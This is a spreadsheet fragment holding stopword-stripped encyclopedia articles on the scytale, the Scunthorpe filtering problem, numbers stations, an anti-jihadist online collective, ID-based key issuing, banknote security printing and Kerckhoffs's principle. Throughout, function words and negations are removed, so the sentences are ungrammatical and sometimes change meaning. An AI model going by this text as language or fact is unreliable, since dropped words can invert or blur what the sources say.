wrapped scytale; written message, take parchment send without piece wood, commander. received cannot otherwise meaning it,--since letters connection, disarranged,--unless takes scytale winds strip parchment that, spiral course restored perfectly, follows joined precedes, reads around staff, discovers continuity message. parchment, like staff, called scytale, thing measured bears name measure. difficulties reconciling description plutarch earlier accounts, circumstantial evidence cryptographic weakness device, several authors suggested scytale used conveying messages plaintext plutarch's description mythological. message authentication hypothesis alternative hypothesis scytale used message authentication rather encryption. only sender wrote message around scytale diameter receiver's would receiver able read would therefore difficult enemy spies inject false messages communication commanders. nonetheless, person intercepting scytale message, heard method, could little difficulty find size needed kind brute force attack); knowing that, would easy supplant sender forge messages. also caesar cipher references further reading</t>
  </si>
  <si>
    <t>Scunthorpe problem</t>
  </si>
  <si>
    <t>scunthorpe problem unintentional blocking websites, e-mails, forum posts search results spam filter search engine text contains string substring) letters appear obscene otherwise unacceptable meaning. names, abbreviations, technical terms often cited affected issue. problem arises since computers easily identify strings text within document, interpreting words kind requires considerable ability interpret wide range contexts, possibly across many cultures, extremely difficult task. result, broad blocking rules result false positives affecting innocent phrases. origin history problem named incident 1996 aol's profanity filter prevented residents town scunthorpe, north lincolnshire, england, creating accounts aol, town's name contains substring "cunt". early 2000s, google's opt-in safesearch filters made error, preventing people searching local businesses urls included scunthorpe names. workarounds scunthorpe problem challenging completely solve difficulty creating filter capable understanding words context.one solution involves creating white list known false positives. word appearing white list ignored filter, even though contains text would otherwise allowed. other examples mistaken decisions obscenity filters include: refused domain names account registrations april 1998, jeff gold attempted register domain name shitakemushrooms.com, substring shit blocked internic filter prohibiting "seven dirty words". (shiitake, commonly spelled shitake, japanese name edible fungus lentinula edodes.) 2000, canadian television news story filtering software found website montreal urban community (communauté urbaine montréal, french) entirely blocked domain name french acronym (www.cum.qc.ca); "cum" (among meanings) english-language slang semen. february 2004 scotland, craig cockburn reported unable surname (pronounced "coburn") hotmail contains substring cock, vulgar slang word penis. separately problems workplace email title, software specialist, contained substring cialis, erectile dysfunction medication commonly mentioned spam e-mails. hotmail initially told spell name c0ckburn (with zero instead letter "o") later reversed ban. 2010, similar problem registering website, first four characters surname caused problem content filter. february 2006, linda callahan initially prevented registering name yahoo! e-mail address contained substring allah. yahoo! later reversed ban. july 2008, herman libshitz could register e-mail address containing name verizon surname contained substring shit, verizon initially rejected request exception. subsequent statement, verizon spokeswoman apologized approving desired e-mail address. blocked searches months leading january 1996, searches super bowl filtered, roman numeral game site (xxx) also used identify pornography. gareth roelofse, designer romansinsussex.co.uk, noted 2004: found many library stations, school networks internet cafes block sites word 'sex' domain name. this challenge romansinsussex.co.uk target audience school children." 2008, filter free wireless service town whakatane zealand blocked searches involving town's name filter's phonetic analysis deemed "whak" sound like fuck; town name māori, māori language "wh" commonly pronounced /f/. town subsequently town name filter's whitelist. july 2011, searches china name jiang blocked following claims sina weibo microblogging site former chinese communist party (ccp) general secretary jiang zemin died. since word "jiang" meaning "river" written chinese character (江), searches related rivers including yangtze (cháng jiāng) produced message: "according relevant laws, regulations policies, results search cannot displayed." february 2018, searches google's shopping platform blocked items glue guns, guns roses, burgundy wine google hastily patched search system displaying results weapons accessories violated google's stated policies. blocked emails 2001, yahoo! mail introduced email filter automatically replaced javascript-related strings alternative versions, prevent possibility cross-site scripting html email. filter would hyphenate terms "javascript", "jscript", "vbscript" "livescript"; replaced "eval", "mocha" "expression" similar quite synonymous terms "review", "espresso" "statement", respectively. assumptions involved writing filters: attempts made limit string replacements anchor script sections attributes, respect word boundaries, case would leave loopholes open. this resulted errors medireview place medieval. february 2003, members parliament british house commons found spam filter blocking emails containing references sexual offences bill debate, well messages relating liberal democrat consultation paper censorship. also blocked emails sent welsh recognise language. october 2004, reported horniman museum london failing receive email filters mistakenly treated name version words horny man. horny common slang term "sexually aroused arousing". blocked words multiple meanings october 2004, e-mails advertising pantomime dick whittington sent teacher norwich blocked school computers name dick, sometimes used slang penis. 2006, manchester found e-mails wrote local council complain planning application blocked contained word erection referring structure. blocked e-mails searches relating beaver, magazine based winnipeg, caused publisher change name canada's history 2010, years publication. publisher deborah morrison commented: "back 1920, beaver perfectly appropriate name. meaning [vulva] nothing new, ambiguity began pose whole challenge advance internet. name became impediment growth". june 2010, twitter blocked user luxembourg minutes opened account posted first tweet. tweet read: "finally! pair great tits (parus major) moved birdhouse!" despite including latin name point tweet birds, attempts unblock account vain. 2011, councillor dudley found email flagged profanity council's security software mentioning black country dish faggots type meatball, also pejorative term men). residents penistone south yorkshire e-mails blocked town's name includes substring penis. residents clitheroe (lancashire, england) repeatedly inconvenienced town's name includes substring clit, short "clitoris". résumés containing references graduating latin honors laude, summa laude, magna laude blocked spam filters inclusion word cum, latin usage), sometimes used slang semen ejaculation english usage. news articles june 2008, news site anti-lgbt american family association filtered associated press article sprinter tyson gay, replacing instances "gay" "homosexual", thus rendering name "tyson homosexual". this function previously changed name basketball player rudy "rudy homosexual". word string "ass" replaced "butt", resulting "clbuttic" "classic", "buttignment" "assignment", "buttbuttinate" "assassinate". other 2008, microsoft confirmed policy prevent words relating sexual orientation meant richard gaywood's name deemed offensive could used "gamertag" "real name" field bio. 2011, video games pokémon black white, pokémon cofagrigus could traded online players without nickname species name contained substring fag. system since updated allow trades pokémon without nicknames. problem occurred nosepass, probopass froslass inclusion substring ass. 2013, file transfers named swedish city falun caused connection outages diakrit, firm based china. diakrit resolved issue renaming files. fredrik bergman diakrit believes file names triggered great firewall's censors used block discussion falun gong, banned religious movement founded china. november 2013, facebook temporarily blocked british users using word faggot reference traditional dish name. january 2014, files used online game league legends reportedly blocked filters names 'varusexpirationtimer.luaobj' 'xerathmagechainsextended.luaobj', contain substring sex. this later corrected. 2018, website grocery store publix would allow cake ordered containing latin phrase summa laude. customer attempted rectify problem including special instructions still ended cake reading "summa laude". 2020, despite extensive media scrutiny, hashtags directly referring british political advisor dominic cummings unable trend twitter substring triggered anti-porn filter. october 2020, twitter profanity filter banned words "bone", "pubic", "stream" paleontology conference. january 2021, facebook apologized muting banning users erroneously flagged devon landmark plymouth misogynistic. april 2021, official facebook page french commune bitche taken down. response, commune officials created page referencing instead postal code, mairie 57230. facebook later apologized restored original page. precaution, officials rohrbach-lès-bitche renamed facebook page ville rohrbach. also censorship google cupertino effect false positive predictive text spam detection wordfilter references</t>
  </si>
  <si>
    <t>Secret broadcast</t>
  </si>
  <si>
    <t>secret broadcast simply put, broadcast consumption general public. invention wireless initially greeted boon armies navies. units could coordinated nearly instant communications. adversary could glean valuable sometimes decisive intelligence intercepted radio signals: messages encrypted poorly encrypted could read order battle future intentions could deduced traffic analysis individual units could located using direction findingin 1920s united states able track japanese fleet exercises even banks monitoring radio transmissions. doctrine developed units field, particularly ships sea, maintain radio silence except urgent situations, reporting contact enemy forces. ships formation reverted pre-wireless methods, including semaphore signal flags, signal lamps used night. communication headquarters sent one-way radio broadcasts. "personal messages" propaganda stations during world would include "personal messages" broadcasts news entertainment occupied-europe. often coded messages intended secret agents. marks attributes idea georges bégué, agent special operations executive felt could eliminate two-way radio traffic often compromised agents. such messages also used authenticate agents sources assistance field. agent would arrange broadcast short phrase person chose. numbers stations mid-twentieth century, high frequency radio bands used numerous stations sending seemingly random morse code, usually five-letter groups. advanced communications methods, teleprinter satellite, took over, number stations diminished, another type appeared transmitted spoken also seemingly random number letter groups, latter usually using words radio alphabet icao/nato alphabet. though official confirmation (beyond 1998 article daily telegraph quoted spokesperson department trade industry saying, "these [numbers stations] suppose are. people mystified them. they for, shall say, public consumption.") little doubt numbers stations primarily used send messages spies clandestine agents (additional possible uses include communication embassies crisis might dictate destruction cryptographic equipment backup normal command systems wartime). other intended recipients secret broadcasts faster easier-to-use equipment disposal. number stations ideal spies require special equipment, beyond short-wave receiver. morse code skills, staple training, longer required. problems secret broadcast issue past limited bandwidth broadcast. morse code typically sent words minute. teleprinters could operate words minute. military uses message precedence system prioritize critical traffic, often, senior commanders insisted high precedence lengthy messages lacking real urgency. also letter beacon numbers station pirate radio piracy amateur two-way radio traffic flow security references external links media related secret broadcasting wikimedia commons</t>
  </si>
  <si>
    <t>Katiba des Narvalos</t>
  </si>
  <si>
    <t>katiba narvalos (from arabic "katiba"="battalion" romani french slang "narvalo"="mad") non-partisan collective constituted citizens venues life, dedicated fighting jihadism social networks generally internet. their tactics comprise parody, discredit jihadist propaganda; surveying reporting offending accounts; infiltrating cyber-jihadist networks prevent terrorist attacks. background islamic state (aka "isis" "daesh") strategists state least half fight waged media, especially social networks, "cyber-jihadists" fighters propagandists.the islamic state fields elaborate media strategy based extreme cruelty, high technical expertise psychological manipulation. instill fear, encourage violence, find recruits. this influence felt front lines, including within cities isis enemies. first cyber-jihadists islamic state depicted merciless successful warriors. between battles, would share moments (dubbed "lol-jihad") within idealised proto-state, complete booming economy efficient public services.in fourth quarter 2014, jihadist networks comprised least 50,000 accounts twitter, favorite social network time. history first parody accounts first french-language parody accounts appeared twitter summer 2014, isis broadcast images murder james foley. disrupt terrorist propaganda using humour mockery means resilience, deconstructing misleading motive invicible jihad ideal caliphate, oppose violence images. humorous effect obtained impersonating jihadists iraq-syria area using vocabulary ridicule discredit them, discord them. time, straightfoward tell parody accounts authentic members isis al-qaeda, would sometimes fooled. parody tweets used #tweetcommeabuuthman hashtag ("tweet like uthman", pseudonym mickael santos, prolific french jihadist propagandist twitter time). famous parody account abou jean rené al-faransi, followed "abu" account comme abou francis al-israeli, abou rico, abou dinblanc "boudin blanc"), abou tantrain (pun "boute-en-train", french "funny person"), abou jaja, abou dner (pun bout nerfs", french one's wit's end") bernard lorrain. operation anonymous isis following january 2015 terrorist attacks, thousands pro-terrorist messages appeared twitter hashtags #jesuiskouachi #jesuiscoulibaly, opposed #jesuischarlie.at time, french authorities interested phenomenon: official anti-radicalisation website, stop-djihadisme.gouv.fr, started three weeks attacks still infancy. side social networks, little enthusiasm suppress jihadist propaganda accounts. group anonymous launched operation hashtags #opcharliehebdo (aimed french speakers) #opiceisis (aimed english speakers), reinforcing already-existing #opisis freeze "ice") communication terrorist organisation. these operations undertaken still little action authorities jihadist propaganda social networks.this series terrorist attacks thus ended mobilising effect individual citizens, organised push back armed fundamentalists. organisation beginning group katiba narvalos (from arabic "battalion" romani slang "madman") emerged coalescence first anti-isis trolls, member anonymous taking part #opcharliehebdo, individual activists. katiba narvalos gained independence anonymous, retaining position influence within #opisis.on february 2015, narvalos launched first deception operation, #dimanchenoir ("black sunday"). hashtag #katibadesnarvalos first appeared march 2015, marking official birth group. members many members joined group terrorits attacks january 2015. militants, dubbed "narvalos" (masculine) "narvalettes" (feminine) come venues life, religions age, typicall form france including overseas territories. members required state political opinions teach temselves geopolitics middle east, computing security. group "emir". first emir abou jean-rené al-faransi succeeded abou tantrain (jihadi jean), followed abd-charlie april 2015.in march 2016, members quit oven ideological disagreements founded another group. katiba organised like intelligence service, various security habilitation depending domains competence members. part teams work surveillance internet reports offending contents social networks moderation removed quickly. other teams work investigations jihadist-hunting world internet. ethics katiba narvalos charter written french, english arabic. notably, explicitly states katiba combats jihadist propaganda only, aimed islam muslims. switch parody offensive action counter-discourse katiba narvalos aims disrupting terrorist propaganda (counter-propaganda) using various methods hijacking meaning image, changing soundtrack propaganda video, copying voice jihadist video spot, issuing fake amaq press releases, spamming jihadist hastags remove campaigns twitter trends, etc.it notably targeted french jihadists omar omsen rachid kassim, well al-hayat media center (main editing production organ islamic state). controlling section (ctrlsec) reporting jihadist accounts twitter "controlling section", named london controlling section founded 1941 winston churchill, complements counter-propaganda parodies.created march 2015 twitter bot, ctrlsec quickly grew independent international group. surveys accounts incite terrorism reports tweets account @ctrlsec, followers mass-report twitter moderators suspended. daily count reported accounts around 500. soon terrorist attacks november 2015, katiba narvalos controlling section worked closely ghost security days. katiba narvalos operated tandem ctrlsec since inception, well independent groups "hunters" detect jihadist accounts report them. according survey ctrlsec august 2018, collectively credited suspending twitter accounts. high effectiveness system noticed numerous specialists, e.t. brooking, researcher international security policy, wrote foreign policy: online activists play important role bringing islamic state supporters twitter's attention review; jihadism expert romain caillet, stated "without internet users, jihadist accounts wouldl 10,000 followers today"; jean-luc marret, researcher fondation pour recherche stratégique, stated katiba narvalos "powerful actor daech internet.due propaganda-disrupting activities, "cyber" division isis, junaid hussain, members group kill lists. extending networks multilingual survey jihadist propaganda material extended sorts platforms. 2016, internet activities daech fighters propagandists noticeably receded twitter, least french language, accelerating suspensions accounts. they switched platforms telegram, vimeo, youtube... consequently, narvalos controlling section extended activities networks. psychological operations group mounted psychological operations aiming demoralising, deceive hinder jihadist propagandists. jihadist hunting some narvalos developed offensive tactics, infiltrating jihadist networks manner similar intelligence services. order avoid incidents, sensitive katiba accounts reported dgsi.in early 2018, officer security service, specialist internet monitoring, testified médiapart: "the katiba shame, better are. they manage geolocalise jhadist form single photograph. cannot that." contributions counter-terrorism 2015, days muhammad drawing caricature competition take place garland, texas, narvalette khalan cypher reported imminent terrorist attack police. ensuing curtis culwell center attack, terrorists killed.in following months, cooperation katiba narvalos, controlling section ghost security antiterrorist authorities made possible arrest terrorist cells preparing attacks july 2015 tunisia york cityin 2017, katiba detected threatening person telegram, identified riad cheikh geolocalised réunion, notifying authorities. arrested months afterwards, travel mainland france, preparing terrorist attack. cheikh sentenced years prison incitation terrorism contempt.by mid-september 2018, katiba claimed derailed four terrorist attacks france, identified offenders, contributed dozen arrests, dismantled several networks. bibliography l'observatoire monde cybernétique, décembre 2013, cyberdjihad l'apport d'internet djihad 4-19, délégation affaires stratégiques, ministère défense lire ligne. david thomson, français jihadistes, 2014, paris, arènes, édition, 2016, graeme wood, enquête veut vraiment l'état islamique courrier international, mars 2015, lire ligne, reprend l'essentiel l'enquête originale parue dans atlantic, what isis really wants janvier 2015. jean-marc lafon, management sauvagerie kurultay.fr, février 2015, lire ligne. romain mielcarek, défense sécurité internationale, hors-série n°41, avril-mai 2015, 90-4, état islamique propagande l'influence lire ligne site l'auteur, avec l'aimable autorisation dsi. olivier moos, l'état islamique cahiers l’institut religioscope, n°13, août 2015, lire ligne. wassim nasr, état islamique, fait accompli, tribune monde plon, 2016, romain caillet, pierre puchot, combat vous prescrit, éditions stock, 2017, matthieu suc, espions terreur, harpercollins, 2018, abou djaffar, terrorisme, guérilla, stratégie autres activités humaines, blog hébergé monde, 2009–2018, lire ligne. scott, (august 2020). grâce ténèbres. paris: calmann-lévy. 318. isbn 978-2-02-144104-8. references annexes also internet activism cyberjihadism ghost security external links katiba narvalos official account (twitter)</t>
  </si>
  <si>
    <t>Secure key issuing cryptography</t>
  </si>
  <si>
    <t>secure issuing variant id-based cryptography reduces level trust needs placed trusted third party spreading trust across multiple third parties. addition normally transmitted information user supplies known "blinding" information used blind (hide) data user later retrieve third party provides "blinded" partial private key, passed several third party order, adding another part blinding passing once user gets (and they) unblind retrieve full private key, point system becomes identity based cryptography. third parties cooperate recover private key, escrow problems arise third parties untrustworthy. areas information security known cascade, every member cascade independent cascade large system considered trustworthy actual practice. paper states "compared certificate-based cryptography, id-based cryptography advantageous management, since distribution revocation required." however poses problem long-lived environments identity (such email address) shift ownership time keys need revoked keys associated identity provided party. references external links 'secure issuing id-based cryptography'</t>
  </si>
  <si>
    <t>Laurence Canter and Martha Siegel</t>
  </si>
  <si>
    <t>Security printing</t>
  </si>
  <si>
    <t>security printing field printing industry deals printing items banknotes, cheques, passports, tamper-evident labels, security tapes, product authentication, stock certificates, postage stamps identity cards. main goal security printing prevent forgery, tampering, counterfeiting. more recently many techniques used protect high-value documents become available commercial printers, whether using traditional offset flexographic presses newer digital platforms. businesses protecting lesser-value documents transcripts, coupons prescription pads incorporating features listed ensure cannot forged alteration data cannot occur undetected. number technical methods used security printing industry. security printing often done security paper, also occur plastic materials. features detectable humans secured documents, banknotes, visible, tactile acoustic features allow humans verification authenticity without tools. european central bank (ecb) recommends feel, look tilt: first check tactility banknote (including substrate), look optical design finally characteristics certain optical features tilting banknote relation incident light. general, introduction banknote series accompanied information campaigns describing design security features. several central banks also provide mobile apps explaining characteristics interactive methods enrich animated effects. general, camera mobile device explain features presented banknote. support direct verification authenticity also work simple printouts screen displays. swissbanknotes swiss national bank swiss franc animated effects malawikwacha reserve bank malawi malawian kwacha interesting simulations tilting tactility well interactive effects enhanced reality sarbcurrency south african reserve bank south african rand offline application explaining security features enhanced reality lilangeni central bank eswatini swazi lilangeni interesting simulations tilting tactility well interactive effects enhanced reality substrate paper substrate banknotes made paper, almost always cotton fibres strength durability; cases linen speciality coloured forensic fibres added give paper added individuality protect counterfeiting. paper substrate also include windows based laser-cut holes covered security foil holographic elements. makes difficult reproduce using common counterfeiting techniques. polymer some countries, including canada, nigeria, romania, mexico, hong kong, zealand, israel, singapore, malaysia, united kingdom australia, produce polymer (plastic) banknotes, improve longevity make counterfeiting difficult. polymer include transparent windows, diffraction grating raised printing. transparent windows format most currencies different dimensions length and/or width different denominations, smaller formats lower denominations larger formats higher denominations, hinder reuse substrate embedded security features counterfeiting higher denominations. blind visually impaired people also rely format distinguishing denominations. visible security features watermark true watermark true watermark recognizable image pattern paper appears lighter darker surrounding paper viewed light behind paper, paper density variations. watermark made impressing water coated metal stamp dandy roll onto paper manufacturing. watermarks first introduced bologna, italy 1282; well security printing, also used paper makers identify product. proofing authenticity, thinner part watermark shine brighter light source background darker dark background. watermark proven anti-counterfeit technology counterfeits simulate appearance using printing pattern. watermarks paper substrate simulated watermark printed white ink, simulated watermarks different reflectance base paper seen angle. because white, cannot photocopied scanned. similar effect achieved iriodin varnish creates reflections certain viewing angles transparent otherwise. watermarks sometimes simulated polymer currency printing according pattern, little anti-counterfeiting effect. example, australian dollar coat arms watermarked plastic bills. diffractive optical element (doe) within transparent window create comparable effect requires laser beam verification. see-through register see-through registers based complementary patterns obverse reverse banknote constitute complete pattern backlight conditions. examples deutsche mark (1989 series, iii) value number first series euro banknotes (es1). counterfeiting difficult printing registration requires extremely high printing accuracy sides minor deviations easily detectable. see-through registers see-through window polymer banknotes printed basically transparent substrate easily provide clear areas sparing white coating. this window overprinted patterns. initially main human security feature polymer banknotes cannot watermark security threads. attracted counterfeiting large volumes printing technology polymer substrate became commonly available. therefore designs additionally laminate window ultra-thin security foil, e.g., frontier series canadian dollar issued 2011, australian dollar (2nd series) issued 2016. similar security feature achieved banknotes paper substrate. area punched sealed partially transparent security foil. series euro banknotes using feature higher denominations (eur above) calls portrait window. european central bank (ecb) recommends look banknote light window hologram becomes transparent reveals portrait europa sides note. see-through windows micro-perforation micro-perforation used microperf swiss franc romanian leu. very small holes punched laser-engraved substrat foil application without generating crater. backlight illumination holes forming pattern, e.g., value numeral like (eighth series). geometric lathe work guilloché ornamental pattern formed curved bands interlace repeat circular design. they made geometric lathe. microprinting this involves extremely small text, often used currency bank checks. text generally small enough indiscernible naked eye. cheques, example, microprint signature line. enlarged microprinting optically variable optically variable (ovi) displays different colors depending angle viewed. uses mica-based glitter. example, euro banknotes feature emerald number series. recommends "tilt banknote". shiny number bottom left corner displays effect light moves down. number also changes colour emerald green deep blue. banknotes also show symbols inside number.colored magnetizable inks prepared including chromatic pigments high color strength. magnetic pigments’ strong inherent color generally reduces spectrum achievable shades. generally, pigments used high concentrations ensure sufficient magnetizable material applied even thin offset coats. some magnetic pigment best suited colored magnetizable inks lower blackness. homogeneous magnetization preferred orientation) easily obtained pigment made spherical particles. best results achieved remanence coercive field strength saturating magnetization high. when pearlescent pigments viewed different angles angle light perceived makes color appear change magnetic fields within particles shift direction. optically variable holograms hologram embedded either hot-stamping foil, wherein extremely thin layer micrometers depth bonded paper plastic substrate means hot-melt adhesive (called size coat) heat metal die, directly embossed holographic paper, onto laminate card itself. when incorporated custom design pattern logo, hologram stamping foils become security foils protect credit cards, passports, bank notes value documents counterfeiting. holograms help curtailing forging, duplication products hence essential security purposes. once stamped product, cannot removed forged, enhancing product time. also security perspective, stamped, hologram superior security device virtually impossible remove substrate. foils holograms security threads metal threads foils, simple iridescent features foil color copying foils additional optically variable effects often used. there kinds security threads. thin aluminum coated partly de-metallized polyester film thread microprinting embedded security paper banknote passport paper. kind security thread single multicolor sewing thread made cotton synthetic fibers, mostly fluorescent, bookbinding passport booklets. recent designs security thread enhanced security features holograms three-dimensional effects tilted. occasion, banknote designers succumb titanic effect (excess belief latest technology), place much faith particular trick. example forgery british banknotes 1990s. british banknotes 1990s featured "windowed" metal strip paper wide comes paper surface every when examined reflected light, appears dotted metallic line running across viewed transmitted light, metal strip dark solid. duplicating thought difficult, criminal gang able reproduce quickly. they used cheap hot-stamping process metal strip surface paper, printed pattern solid bars using white leave expected metal pattern visible. trial, found forged tens millions pounds’ worth notes period years. security threads prismatic coloration color greatly assist prevention forgeries. including color document color photocopier must used attempt make copy however machines also tends enhance effectiveness technologies void pantographs verification grids (see copy-evident above). using colors background blending together prismatic effect created. this done either traditional digital press. when document using technique attempted photocopied scanning re-creation color copier inexact usually resulting banding blotching thereby immediate recognition document copy. frequent example prismatic coloring checks combined techniques void pantograph increase difficulty successful counterfeiting. copy-evidence sometimes original document value. original signed cheque example value photocopy not. original prescription script filled photocopy copy-evident technologies provide security hard copy documents helping distinguish original document copy. common technology help differentiate originals copies void pantograph. void pantographs essentially invisible untrained, naked original scanned copied layout lines, dots dashes reveal word (frequently void hence name) symbol clearly allows copy identified. this technology available traditional presses (offset flexographic) newer digital platforms. advantage digital press single pass printer void pantograph variable data printed plain paper. copy-evident paper, sometimes marketed ‘security paper’, pre-printed void pantograph paper usually produced offset flexographic press. quality void pantograph usually quite good produced press high resolution, and, small number originals printed, cost-effective solution; however, advent digital printer rapidly eroded benefit. second technology complements enhances effectiveness void pantograph verification grid. this technology visible original, usually fine lines symbols photocopied lines images disappear; inverse reaction void pantograph. common examples technology fine lines edge cheque disappear copied coupon symbol, shopping cart, disappears unauthorized copy made. verification grid available either traditional digital presses. together void pantograph verification grid complement reactions copying inverse, resulting higher degree assurance hard copy document original. registration features sides banknotes typically printed fine alignment (so-called see-through registration window) offset printing side note. this allows note examined feature, provides opportunities unambiguously align features note printing. again, difficult imitate accurately enough print shops. see-through registration thermochromatic security normal "trigger" temperature °c), either disappear change colors rubbed, usually fingertips. this based thermochromatic effect. serial numbers serial numbers help make legitimate documents easier track audit. however, barely useful security feature duplicates existing serial number easily detectable, except series identical counterfeits. support correct identification serial numbers normally check digit verify correct reading serial number. banknote printing unique serial number provides effective means monitoring verification production volume. cases recording serial numbers help track identify banknotes blackmail robbery. currencies serial number printed edges banknotes aggravate making so-called composed banknotes combining parts different banknotes. even made genuine banknotes, central banks consider items manipulated banknotes without value serial numbers match. serial numbers banknotes tactile security features paper feeling security paper banknotes different standard paper special ingredients like fibers cotton, linen abaca. together intaglio printing crisp feeling provides excellent tactile perception (crisp feeling) reject counterfeits based standard paper cellulose fibers. polymer substrates limp banknotes paper substrate offer tactile characteristic. intaglio printing intaglio printing technique image incised surface. normally, copper zinc plates used, incisions created etching engraving image, also mezzotint. printing, surface covered ink, rubbed vigorously tarlatan cloth newspaper remove surface, leaving incisions. damp piece paper placed top, plate paper printing press that, pressure, transfers paper. sharp printing obtained intaglio process hard imitate means. intaglio also allows creation latent images visible document viewed shallow angle. mobile valicash koenig bauer evaluates specific characteristics intaglio printing euro banknotes printed paper substrate. available devices takes picture banknote. within seconds determines abnormality message "not successful" cannot finally identify counterfeits. embossing substrate embossed create raised designs tactile security feature. combined intaglio printing. example, euro series different pattern lines short edges banknote support blind people distinguishing denominations. security features detectable simple tools halo carefully created images hidden background picture document. these images cannot seen without help inexpensive lens specific line screening. when placed location image rotated image becomes visible. document photocopied halo image lost. known implementation scrambled indicia.halo printed traditional digital presses. advantage traditional presses multiple images overlaid location become visible turn lens rotated. halo used technique authenticate originality document used verify critical information within document. example, value coupon might encoded halo image could verified time redemption similarly seat number sporting event ticket. latent images pressure-sensitive stamped labels characterized normal (gray colored) appearance. when viewed special filter (such polarizer) additional, normally latent, image appears. with intaglio printing, similar effect achieved viewing banknote slanted angle. false-positive testing false-positive testing derives name testing requires false positive reaction authenticate document. common instance widely available counterfeit detector marker seen many banks stores. counterfeit detector markers chemical interaction substrate, usually paper, document turning particular color. usually marker turns newsprint black leaves currency specially treated areas document clear gold. reaction coloring varies depending upon formulation. banknotes, specially manufactured substrate, usually behave differently standard newsprint paper difference counterfeits detected markers. false-positive testing also done documents currencies means test authenticity. with stroke marker symbol, word value revealed allow user quickly verify document, coupon. advanced applications marker creates barcode scanned verification reference data within document resulting higher degree assurance authenticity. photocopied documents lack special characteristics substrate easily detectable. false-positive testing generally time test done results remain visible useful part coupon technique suitable badges example. fluorescent dyes fluorescent dyes react fluorescence ultraviolet light unusual lighting. these show words, patterns pictures visible invisible normal lighting. this feature also incorporated many banknotes documents e.g. northern ireland prescriptions show picture local '8th wonder' giant's causeway light. some producers include multi-frequency fluorescence, different elements fluoresce specific frequencies light. phosphorescence accompany fluorescence shows after-glow light switched off. fluorescence euro banknote (series es1) infrared characteristics inks identical color characteristics visible spectrum differ infrared spectrum. infrared characteristics banknote (es1) machine-readable security features machine-readable features used passports border control banknote processing. commercial market using level features (l2) partly disclosed central banks. this applies cash handling machines, automated teller machines ticket machines. central banks additionally using level features (l3) kept completely secret. they necessary maintain integrity cash circulation isolate professional counterfeiting.there following machine-readable features (extract): magnetic because speed read computer systems, magnetic character recognition used extensively banking, primarily personal checks. used magnetic character recognition (micr) technology also used greatly reduce errors automated computerized) reading. pigment dispersed binder system (resin, solvent) compound applied either pressing melt carrier film (usually polyethylene).some people believe magnetic intended fraud prevention concept, original intent non-optical technology writing cheque, like signatures, would interfere reading. main magnetic fonts (e13-b cmc7) downloadable small addition magnetic toner available many printers. some higher resolution toners sufficient magnetic properties magnetic reading successful without special toner. phosphorescent dyes phosphorescence accompany fluorescence shows after-glow light switched off. anti-copying marks late twentieth century advances computer photocopy technology made possible people without sophisticated training easily copy currency. attempt prevent this, banks sought filtering features software hardware available public senses features currency, locks reproduction material marks. known example system eurion constellation. banknotes anti-copying marks electronic devices with advent radio frequency identification (rfid) based smart card technology, possible insert extremely small rf-active devices printed product enhance document security. this apparent modern biometric passports, rfid chip mirrors printed information. biometric passports additionally include data verification individual's fingerprint face recognition automated border control gates. copy detection pattern digital watermark copy detection pattern digital watermark inserted digital image printing security document. these security features designed copy-sensitive authenticated imaging device. level features most central banks also implement so-called level features (l3) kept totally secret ingredients well sophisticated measurement. such covert features embedded within substrate and/or printing commercially available. they ultimate safeguard banknote security restricted central banks. also authentication, particularly subject product authentication tamper-evident technology, particularly money stamps tamper resistance, particularly subject packaging brand protection security label banknote processing, particularly security features detected references external links "banknote security features" (pdf). billetaria issue madrid: banco espana. october 2014. 46–47. retrieved 2019-06-13. presents catalogue main banknote security features recognisable public currently worldwide. council glossary security documents, security features related technical terms euipo anti-counterfeiting technology guide</t>
  </si>
  <si>
    <t>Kerckhoffs's principle</t>
  </si>
  <si>
    <t>kerckhoffs's principle (also called kerckhoffs's desideratum, assumption, axiom, doctrine law) cryptography stated dutch-born cryptographer auguste kerckhoffs 19th century. principle holds cryptosystem secure, even everything system, except key, public knowledge. this concept widely embraced cryptographers, contrast security obscurity, not. kerckhoffs's principle reformulated possibly independently formulated) american mathematician claude shannon "the enemy knows system", i.e., "one ought design systems assumption enemy immediately gain full familiarity them". form, called shannon's maxim. another formulation american researcher professor steven bellovin follows: words design system assuming opponents know detail. former official nsa's national computer security center told standard assumption serial number device delivered kremlin.) origins 1883 auguste kerckhoffs wrote journal articles cryptographie militaire, first stated design principles military ciphers. translated french, are: system must practically, mathematically, indecipherable; require secrecy, problem falls enemy hands; must possible communicate remember without using written notes, correspondents must able change modify will; must applicable telegraph communications; must portable, require several persons handle operate; lastly, given circumstances used, system must easy stressful require users know comply long list rules.some longer relevant given ability computers perform complex encryption, second axiom, known kerckhoffs's principle, still critically important. explanation principle kerckhoffs viewed cryptography rival better alternative than, steganographic encoding, common nineteenth century hiding meaning military messages. problem encoding schemes rely humanly-held secrets "dictionaries" disclose example, secret meaning words. steganographic-like dictionaries, revealed, permanently compromise corresponding encoding system. another problem risk exposure increases number users holding secrets increases. nineteenth century cryptography, contrast, used simple tables provided transposition alphanumeric characters, generally given row-column intersections could modified keys generally short, numeric, could committed human memory. system considered "indecipherable" tables keys convey meaning themselves. secret messages compromised matching table, key, message falls enemy hands relevant time frame. kerckhoffs viewed tactical messages hours relevance. systems necessarily compromised, components (i.e. alphanumeric character tables keys) easily changed. advantage secret keys using secure cryptography supposed replace difficult problem keeping messages secure much manageable one, keeping relatively small keys secure. system requires long-term secrecy something large complex whole design cryptographic system obviously cannot achieve goal. replaces hard problem another. however, system secure even enemy knows everything except key, needed manage keeping keys secret. there large number ways internal details widely used system could discovered. obvious someone could bribe, blackmail, otherwise threaten staff customers explaining system. war, example, side probably capture equipment people side. each side also spies gather information. method involves software, someone could memory dumps software control debugger order understand method. hardware used, someone could steal hardware build whatever programs gadgets needed test hardware also dismantled chip details examined microscope. maintaining security generalization make kerckhoffs's principle "the fewer simpler secrets must keep ensure system security, easier maintain system security." bruce schneier ties belief security systems must designed fail gracefully possible: principle applies beyond codes ciphers security systems general: every secret creates potential failure point. secrecy, words, prime cause brittleness—and therefore something likely make system prone catastrophic collapse. conversely, openness provides ductility. security system depends crucially keeping things secret. however, kerckhoffs's principle points things kept secret ought least costly change inadvertently disclosed. example, cryptographic algorithm implemented hardware software widely distributed among users. security depends keeping secret, disclosure leads major logistic difficulties developing, testing, distributing implementations algorithm "brittle". hand, keeping algorithm secret important, keys used algorithm must secret, disclosure keys simply requires simpler, less costly process generating distributing keys. applications accordance kerckhoffs's principle, majority civilian cryptography makes publicly known algorithms. contrast, ciphers used protect classified government military information often kept secret (see type encryption). however, assumed government/military ciphers must kept secret maintain security. possible intended cryptographically sound public algorithms, decision keep secret keeping layered security posture. security obscurity moderately common 